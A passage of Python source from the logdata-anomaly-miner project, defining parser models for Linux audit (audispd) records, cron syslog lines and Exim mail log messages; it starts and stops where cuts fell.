"MQ_OPEN": AnyByteDataModelElement("mq_open"), "MQ_SENDRECV": AnyByteDataModelElement("mq_sendrecv"), "NETFILTER_CFG": SequenceModelElement("netfilter_cfg", [ FixedDataModelElement("s0", b" table="), FixedWordlistDataModelElement("table", [b"filter", b"mangle", b"nat"]), FixedDataModelElement("s1", b" family="), DecimalIntegerValueModelElement("family"), FixedDataModelElement("s2", b" entries="), DecimalIntegerValueModelElement("entries") ]), "NETFILTER_PKT": SequenceModelElement("netfilter_pkt", [ FixedDataModelElement("s0", b" mark=0x"), HexStringModelElement("mark"), FixedDataModelElement("s1", b" saddr="), FirstMatchModelElement("saddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s2", b" daddr="), FirstMatchModelElement("daddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s3", b" proto="), DecimalIntegerValueModelElement("proto") ]), "OBJ_PID": SequenceModelElement("objpid", [ FixedDataModelElement("s0", b" opid="), DecimalIntegerValueModelElement("opid"), FixedDataModelElement("s1", b" oauid="), DecimalIntegerValueModelElement("oauid", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s2", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s3", b" oses="), DecimalIntegerValueModelElement("oses", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s4", b" obj="), DelimitedDataModelElement("obj", b" "), FixedDataModelElement("s4", b" ocomm="), ExecArgumentDataModelElement("ocomm") ]), "PATH": SequenceModelElement("path", [ FixedDataModelElement("s0", b" item="), DecimalIntegerValueModelElement("item"), FixedDataModelElement("s1", b" name="), ExecArgumentDataModelElement("name"), FirstMatchModelElement("fsinfo", [ SequenceModelElement("inodeinfo", [ FixedDataModelElement("s0", b" inode="), 
DecimalIntegerValueModelElement("inode"), FixedDataModelElement("s1", dev), # A special major/minor device element could be better here. VariableByteDataModelElement("dev", b"0123456789abcdef:"), FixedDataModelElement("s2", b" mode="), # is octal DecimalIntegerValueModelElement("mode", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s3", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s4", b" ogid="), DecimalIntegerValueModelElement("ogid"), FixedDataModelElement("s5", b" rdev="), # A special major/minor device element could be better here (see above). VariableByteDataModelElement("rdev", b"0123456789abcdef:"), FixedDataModelElement("s6", b" nametype=") ]), FixedDataModelElement("noinfo", b" nametype=")]), FixedWordlistDataModelElement("nametype", [b"CREATE", b"DELETE", b"NORMAL", b"PARENT", b"UNKNOWN"]) ]), "PROCTITLE": SequenceModelElement("proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle")]), "RESP_ACCT_LOCK": AnyByteDataModelElement("resp_acct_lock"), "RESP_ACCT_LOCK_TIMED": AnyByteDataModelElement("resp_acct_lock_timed"), "RESP_ACCT_REMOTE": AnyByteDataModelElement("resp_acct_remote"), "RESP_ACCT_UNLOCK_TIMED": AnyByteDataModelElement("resp_acct_unlock_timed"), "RESP_ALERT": AnyByteDataModelElement("resp_alert"), "RESP_ANOMALY": AnyByteDataModelElement("resp_anomaly"), "RESP_EXEC": AnyByteDataModelElement("resp_exec"), "RESP_HALT": AnyByteDataModelElement("resp_halt"), "RESP_KILL_PROC": AnyByteDataModelElement("resp_kill_proc"), "RESP_SEBOOL": AnyByteDataModelElement("resp_sebool"), "RESP_SINGLE": AnyByteDataModelElement("resp_single"), "RESP_TERM_ACCESS": AnyByteDataModelElement("resp_term_access"), "RESP_TERM_LOCK": AnyByteDataModelElement("resp_term_lock"), "ROLE_ASSIGN": AnyByteDataModelElement("role_assign"), "ROLE_MODIFY": AnyByteDataModelElement("role_modify"), "ROLE_REMOVE": AnyByteDataModelElement("role_remove"), "SELINUX_ERR": 
SequenceModelElement("service_err", [ FixedDataModelElement("s0", b" op="), DelimitedDataModelElement("op", b" "), FixedDataModelElement("s1", reason), DelimitedDataModelElement("reason", b" "), FixedDataModelElement("s2", b" scontext="), DelimitedDataModelElement("scontext", b" "), FixedDataModelElement("s3", b" tcontext="), DelimitedDataModelElement("tcontext", b" "), FixedDataModelElement("s4", b" tclass="), DelimitedDataModelElement("tclass", b" "), FixedDataModelElement("s5", b" perms="), VariableByteDataModelElement("perms", perms_alphabet) ]), "SERVICE_START": SequenceModelElement("service", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='"), OptionalMatchModelElement("optional_msg", DelimitedDataModelElement("msg", b" ")), FixedDataModelElement("s5", b' comm="'), DelimitedDataModelElement("comm", b'"'), FixedDataModelElement("s5", b'" exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "SOCKADDR": SequenceModelElement("sockaddr", [ FixedDataModelElement("s0", b" saddr="), HexStringModelElement("sockaddr", upper_case=True) ]), "SOCKETCALL": SequenceModelElement("socketcall", [ FixedDataModelElement("s0", b" nargs="), DecimalIntegerValueModelElement("nargs"), RepeatedElementDataModelElement("args", SequenceModelElement("arg", [ FixedDataModelElement("s1", b" a"), DecimalIntegerValueModelElement("arg_num"), FixedDataModelElement("s2", 
b"="), DecimalIntegerValueModelElement("arg"), ])) ]), "SYSCALL": SequenceModelElement("syscall", [ FixedDataModelElement("s0", b" arch="), HexStringModelElement("arch"), FixedDataModelElement("s1", b" syscall="), DecimalIntegerValueModelElement("syscall"), OptionalMatchModelElement( "personality", SequenceModelElement("pseq", [ FixedDataModelElement("s0", b" per="), DecimalIntegerValueModelElement("personality") ])), OptionalMatchModelElement("result", SequenceModelElement("rseq", [ FixedDataModelElement("s2", b" success="), FixedWordlistDataModelElement("succes", [b"no", b"yes"]), FixedDataModelElement("s3", b" exit="), DecimalIntegerValueModelElement("exit", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ])), FixedDataModelElement("s4", b" a0="), HexStringModelElement("arg0"), FixedDataModelElement("s5", b" a1="), HexStringModelElement("arg1"), FixedDataModelElement("s6", b" a2="), HexStringModelElement("arg2"), FixedDataModelElement("s7", b" a3="), HexStringModelElement("arg3"), FixedDataModelElement("s8", b" items="), DecimalIntegerValueModelElement("items"), FixedDataModelElement("s9", b" ppid="), DecimalIntegerValueModelElement("ppid"), FixedDataModelElement("s10", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s11", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s12", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s13", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s14", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("s15", b" suid="), DecimalIntegerValueModelElement("suid"), FixedDataModelElement("s16", b" fsuid="), DecimalIntegerValueModelElement("fsuid"), FixedDataModelElement("s17", b" egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("s18", b" sgid="), DecimalIntegerValueModelElement("sgid"), FixedDataModelElement("s19", b" fsgid="), DecimalIntegerValueModelElement("fsgid"), 
FixedDataModelElement("s20", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("s21", ses), DecimalIntegerValueModelElement("sesid"), FixedDataModelElement("s22", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s23", exe), DelimitedDataModelElement("executable", b'"'), FixedDataModelElement("s24", b'" key='), AnyByteDataModelElement("key") ]), "SYSTEM_BOOT": AnyByteDataModelElement("system_boot"), "SYSTEM_RUNLEVEL": AnyByteDataModelElement("system_runlevel"), "SYSTEM_SHUTDOWN": AnyByteDataModelElement("system_shutdown"), "TRUSTED_APP": AnyByteDataModelElement("trusted_app"), "TTY": AnyByteDataModelElement("tty"), # The UNKNOWN type is used then audispd does not know the type of the event, usually because the kernel is more recent than audispd, # thus emiting yet unknown event types. # * type=1327: procitle: see https://www.redhat.com/archives/linux-audit/2014-February/msg00047.html "UNKNOWN[1327]": SequenceModelElement("unknown-proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle") ]), "USER_ACCT": SequenceModelElement("useracct", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:accounting acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), 
pam_status_word_list, FixedDataModelElement("s10", b")'") ]), "USER_AUTH": SequenceModelElement("userauth", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:authentication acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "USER_AVC": AnyByteDataModelElement("user_avc"), "USER_CHAUTHTOK": AnyByteDataModelElement("user_chauthtok"), "USER_CMD": SequenceModelElement("user_cmd", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='"), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s4", b' cmd="'), DelimitedDataModelElement("cmd", b'"'), FixedDataModelElement("s5", b"\" (terminal=pts/0"), FixedDataModelElement("s6", res), pam_status_word_list, FixedDataModelElement("s7", b")'"), ]), "USER_END": SequenceModelElement("userend", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), 
FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b' msg=\'PAM: session close acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b")'"), ]), "USER_ERR": SequenceModelElement("usererr", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: bad_ident acct=? 
: exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s4", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s5", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s6", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b")'") ]), "USER_LABELED_EXPORT": AnyByteDataModelElement("user_labeled_export"), "USER_LOGIN": SequenceModelElement("userlogin", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s4", b'":' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'") ]), "USER_LOGOUT": AnyByteDataModelElement("user_logout"), "USER_MAC_POLICY_LOAD": AnyByteDataModelElement("user_mac_policy_load"), "USER_MGMT": AnyByteDataModelElement("user_mgmt"), "USER_ROLE_CHANGE": SequenceModelElement("user_role_change", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", b" 
msg='pam: "), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b" selected-context="), DelimitedDataModelElement("selected_context", b" "), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "USER_SELINUX_ERR": AnyByteDataModelElement("user_selinux_err"), "USER_START": SequenceModelElement("userstart", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: session open acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s4", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'"), ]), "USER_TTY": AnyByteDataModelElement("user_tty"), "USER_UNLABELED_EXPORT": AnyByteDataModelElement("user_unlabeled_export"), "USYS_CONFIG": AnyByteDataModelElement("usys_config"), "VIRT_CONTROL": AnyByteDataModelElement("virt_control"), "VIRT_MACHINE_ID": AnyByteDataModelElement("virt_machine_id"), "VIRT_RESOURCE": AnyByteDataModelElement("virt_resource") } type_branches["SERVICE_STOP"] = type_branches["SERVICE_START"] model = 
SequenceModelElement("audispd", [ OptionalMatchModelElement("optional", FirstMatchModelElement("type", [ FixedDataModelElement("sname", b"audispd: "), FixedDataModelElement("sname_remote", b"audisp-remote: "), ])), FirstMatchModelElement("msg", [ ElementValueBranchModelElement("record", SequenceModelElement("preamble", [ FixedDataModelElement("s0", b"type="), WhiteSpaceLimitedDataModelElement("type"), FixedDataModelElement("s1", b" msg=audit("), DecimalIntegerValueModelElement("time"), FixedDataModelElement("s0", b"."), DecimalIntegerValueModelElement("ms", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s1", b":"), DecimalIntegerValueModelElement("seq"), FixedDataModelElement("s2", b"):") ]), "type", type_branches, default_branch=None), FixedDataModelElement("queue-full", b"queue is full - dropping event") ]) ]) return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/CronParsingModel.py000066400000000000000000000046351500476301700322650ustar00rootroot00000000000000
"""This module defines a parser for cron."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model(user_name_model=None):
    """
    Return a model to parse a cron message logged via syslog after any standard logging preamble, e.g. from syslog.

    @param user_name_model element used wherever a user name appears in the message; when None, a
    VariableByteDataModelElement named "user" over lowercase letters, digits, "." and "-" is used.
    @return a FirstMatchModelElement named "cron" with the branches "std" (CRON[pid]: ...) and "low" (cron[pid]: ... RELOAD ...).
    """
    if user_name_model is None:
        user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-")

    # "(user) CMD <command>" - the command text is consumed as-is up to the end of the line.
    exec_message = SequenceModelElement("exec", [
        FixedDataModelElement("s0", b"("),
        user_name_model,
        FixedDataModelElement("s1", b") CMD "),
        AnyByteDataModelElement("command")
    ])

    # pam_unix session "opened"/"closed" lines; the trailing " by (uid=0)" is optional.
    pam_message = SequenceModelElement("pam", [
        FixedDataModelElement("s0", b"pam_unix(cron:session): session "),
        FixedWordlistDataModelElement("change", [b"opened", b"closed"]),
        FixedDataModelElement("s1", b" for user "),
        user_name_model,
        OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)"))
    ])

    # Lines emitted with the upper-case "CRON[" prefix carry one of the two message types above.
    standard_line = SequenceModelElement("std", [
        FixedDataModelElement("sname", b"CRON["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msgtype", [exec_message, pam_message])
    ])

    # Lines emitted with the lower-case "cron[" prefix report a crontab reload.
    reload_line = SequenceModelElement("low", [
        FixedDataModelElement("sname", b"cron["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: (*system*"),
        DelimitedDataModelElement("rname", b") RELOAD ("),
        FixedDataModelElement("s1", b") RELOAD ("),
        DelimitedDataModelElement("fname", b")"),
        FixedDataModelElement("s2", b")"),
    ])

    return FirstMatchModelElement("cron", [standard_line, reload_line])
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/EximGenericParsingModel.py000066400000000000000000001140051500476301700335540ustar00rootroot00000000000000
"""This module defines a generic parser model for exim."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import
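FixedDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement


def get_model():
    """
    Return a model to parse Exim logs from the AIT-LDS.

    The root is a FirstMatchModelElement named "model". Its first branch, "date_seq", covers lines that begin with a
    "%Y-%m-%d %H:%M:%S" timestamp (queue run markers, message arrival/delivery lines and a number of remote SMTP error
    texts); the remaining branches ("no_date_seq", "invalid_dns_record", "mail_rejected", "mail_authentication_error",
    "bad_helo_record", "domain_not_exists", "rejected_due_to_spam_content") cover lines that do not start with that
    timestamp. Several element ids ("msg", "version", "mail_to", ...) are reused within one sequence; the same element
    objects (dtme, msg_id, host, ...) are shared between branches.
    @return the root FirstMatchModelElement.
    """
    alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]"
    size_str = b" SIZE="
    host_str1 = b" host "
    host_str = b":" + host_str1
    status_code421 = b": 421"
    status_code450 = b": 450 "
    status_code451 = b": 451 "
    status_code452 = b": 452 <"
    status_code550 = b": 550"
    status_code553 = b": 553 "
    status_code554 = b": 554 "
    dtme = DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S")
    msg_id = DelimitedDataModelElement("id", b" ")
    ip = IpAddressDataModelElement("ip")
    host_ip = IpAddressDataModelElement("host_ip")
    host = DelimitedDataModelElement("host", b" ")
    size = DecimalIntegerValueModelElement("size")
    port = DecimalIntegerValueModelElement("port")
    # Exim main-log field markers: H=host, R=router, T=transport, F=sender, A=auth, U=user, P=protocol, S=size, X=cipher, C=confirmation.
    h_str = b" H="
    h_str1 = b"H="
    r_str = b" R="
    t_str = b" T="
    f_str = b" F=<"
    a_str = b" A="
    u_str = b" U="
    p_str = b" P="
    s_str = b" S="
    x_str = b" X="
    c_str = b" C=\""
    id_str = b" id="
    a = DelimitedDataModelElement("a", b" ")
    r = DelimitedDataModelElement("r", b" ")
    t = DelimitedDataModelElement("t", b" ")
    u = DelimitedDataModelElement("u", b" ")
    p = DelimitedDataModelElement("p", b" ")
    h = DelimitedDataModelElement("h", b" ")
    x = DelimitedDataModelElement("x", b" ")
    c = DelimitedDataModelElement("c", b'"')
    s = DecimalIntegerValueModelElement("s")
    mail_from = DelimitedDataModelElement("mail_from", b" ")
    smtp_error_from_remote = b"SMTP error from remote mail server after MAIL FROM:<"

    model = FirstMatchModelElement("model", [
        SequenceModelElement("date_seq", [
            dtme,
            FixedDataModelElement("sp", b" "),
            FirstMatchModelElement("fm", [
                SequenceModelElement("start", [
                    FixedDataModelElement("start", b"Start queue run: pid="),
                    DecimalIntegerValueModelElement("pid"),
                ]),
                SequenceModelElement("end", [
                    FixedDataModelElement("end", b"End queue run: pid="),
                    DecimalIntegerValueModelElement("pid"),
                ]),
                SequenceModelElement("no_host_found", [
                    FixedDataModelElement("no_host_found_str", b"no host name found for IP address "),
                    ip,
                ]),
                SequenceModelElement("vrfy_failed", [
                    FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "),
                    DelimitedDataModelElement("mail", b" "),
                    FixedDataModelElement("h_str", h_str),
                    h,
                    FixedDataModelElement("sp1", b" ["),
                    ip,
                    FixedDataModelElement("sp2", b"]")
                ]),
                SequenceModelElement("deferred", [
                    msg_id,
                    FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after MAIL FROM:<"),
                    DelimitedDataModelElement("from_mail", b">"),
                    FixedDataModelElement("s0", b">" + size_str),
                    size,
                    FixedDataModelElement("s1", host_str),
                    host,
                    FixedDataModelElement("s2", b" ["),
                    host_ip,
                    FixedDataModelElement("status_code", b"]" + status_code421 + b" "),  # status code has always to be 421 in this error.
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("s3", b" ["),
                    DelimitedDataModelElement("domain", b"]"),
                    FirstMatchModelElement("status", [
                        SequenceModelElement("temporary", [
                            FixedDataModelElement("s4", b"] Message from ("),
                            IpAddressDataModelElement("from_ip"),
                            FixedDataModelElement("s5", b") temporarily deferred - "),
                            DelimitedDataModelElement("reason_code", b" "),
                            FixedDataModelElement("s6", b" Please refer to "),
                            VariableByteDataModelElement("refer_addr", alphabet)
                        ]),
                        SequenceModelElement("permanent", [
                            FixedDataModelElement("s4", b"] All messages from "),
                            IpAddressDataModelElement("from_ip"),
                            FixedDataModelElement("s5", b" will be permanently deferred; Retrying will NOT succeed. See "),
                            VariableByteDataModelElement("refer_addr", alphabet)
                        ])
                    ]),
                ]),
                SequenceModelElement("temporary_deferred_new", [
                    msg_id,
                    FixedDataModelElement("s0", h_str),
                    host,
                    FixedDataModelElement("s1", b" ["),
                    host_ip,
                    FixedDataModelElement("s2", b"]:"),
                    FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after pipelined MAIL FROM:<"),
                    DelimitedDataModelElement("from_mail", b">"),
                    FixedDataModelElement("s3", b">" + size_str),
                    size,
                    FixedDataModelElement("status_code", status_code421 + b" "),  # status code has to be 421 in this error message.
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("s4", b" ["),
                    DelimitedDataModelElement("domain", b"]"),
                    FixedDataModelElement("s5", b"] Messages from "),
                    IpAddressDataModelElement("from_ip"),
                    FixedDataModelElement("s6", b" temporarily deferred due to unexpected volume or user complaints - "),
                    DelimitedDataModelElement("reason_code", b" "),
                    FixedDataModelElement("s7", b" see "),
                    VariableByteDataModelElement("refer_addr", alphabet)
                ]),
                SequenceModelElement("rate_limited", [
                    msg_id,
                    FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after end of data" + host_str),
                    host,
                    FixedDataModelElement("s0", b" ["),
                    host_ip,
                    FixedDataModelElement("status_code", b"]" + status_code421 + b"-"),  # status code has to be 421 in this error message.
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("s1", b" ["),
                    IpAddressDataModelElement("ip"),
                    FixedDataModelElement("s2", b" "),
                    DecimalIntegerValueModelElement("number"),
                    # The multi-line 421 reply is logged as one line with literal "\n421-" separators.
                    FixedDataModelElement("msg", b"] Our system has detected an unusual rate of\\n421-"),
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("msg", b" unsolicited mail originating from your IP address. To protect our\\n421-"),
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("msg", b" users from spam, mail sent from your IP address has been temporarily\\n421-"),
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("msg", b" rate limited. Please visit\\n421-"),
                    DelimitedDataModelElement("version", b" ", consume_delimiter=True),
                    DelimitedDataModelElement("website", b" "),
                    FixedDataModelElement("msg", b" to review our Bulk\\n421 "),
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("msg", b" Email Senders Guidelines. "),
                    msg_id,
                    FixedDataModelElement("gsmtp", b" - gsmtp")
                ]),
                SequenceModelElement("service_unavailable", [
                    msg_id,
                    FixedDataModelElement("msg", b" SMTP error from remote mail server after RCPT TO:<"),
                    DelimitedDataModelElement("mail_to", b">"),
                    FixedDataModelElement("s0", b">" + host_str),
                    host,
                    FixedDataModelElement("s1", b" ["),
                    host_ip,
                    FixedDataModelElement("status_code", b"]" + status_code450),
                    DelimitedDataModelElement("version", b" "),
                    FixedDataModelElement("msg", b" Service unavailable")
                ]),
                SequenceModelElement("host_unable_to_send", [
                    msg_id,
                    FixedDataModelElement("s0", b" == "),
                    DelimitedDataModelElement("from_mail", b" "),
                    FixedDataModelElement("s1", r_str),
                    r,
                    FixedDataModelElement("s2", t_str),
                    t,
                    FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"),
                    DelimitedDataModelElement("to_mail", b">"),
                    FixedDataModelElement("s3", b">" + host_str),
                    host,
                    FixedDataModelElement("s4", b" ["),
                    host_ip,
                    FixedDataModelElement("status_code", b"]" + status_code451),
                    FixedDataModelElement("msg", b"Temporary local problem - please try later")
                ]),
                SequenceModelElement("uncomplete_sender_verify", [
                    FixedDataModelElement("s0", h_str1),
                    h,
                    FixedDataModelElement("s1", b" ("),
                    DelimitedDataModelElement("domain", b")"),
                    FixedDataModelElement("s2", b") ["),
                    IpAddressDataModelElement("ipv6", ipv6=True),
                    FixedDataModelElement("s3", b"]:"),
                    port,
                    FirstMatchModelElement("reason", [
                        SequenceModelElement("permission_denied", [
                            FixedDataModelElement("msg", b" sender verify defer for <"),
                            DelimitedDataModelElement("from_mail", b">"),
                            FixedDataModelElement("msg", b">: require_files: error for "),
                            DelimitedDataModelElement("required_file", b":"),
                            FixedDataModelElement("msg", b": Permission denied")
                        ]),
                        SequenceModelElement("rejected_rcpt", [
                            FixedDataModelElement("s0", f_str),
                            DelimitedDataModelElement("from", b">"),
                            FixedDataModelElement("s1", b">" + a_str),
                            DelimitedDataModelElement("a", b" "),
                            FixedDataModelElement("msg", b" temporarily rejected RCPT <"),
                            DelimitedDataModelElement("rcpt", b">"),
                            FixedDataModelElement("msg", b">: Could not complete sender verify")
                        ])
                    ])
                ]),
                SequenceModelElement("domain_size_limit_exceeded", [
                    msg_id,
                    FixedDataModelElement("s0", b" =="),
                    DelimitedDataModelElement("mail_to", b" "),
                    FixedDataModelElement("s1", r_str),
                    r,
                    FixedDataModelElement("s2", t_str),
                    t,
                    FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"),
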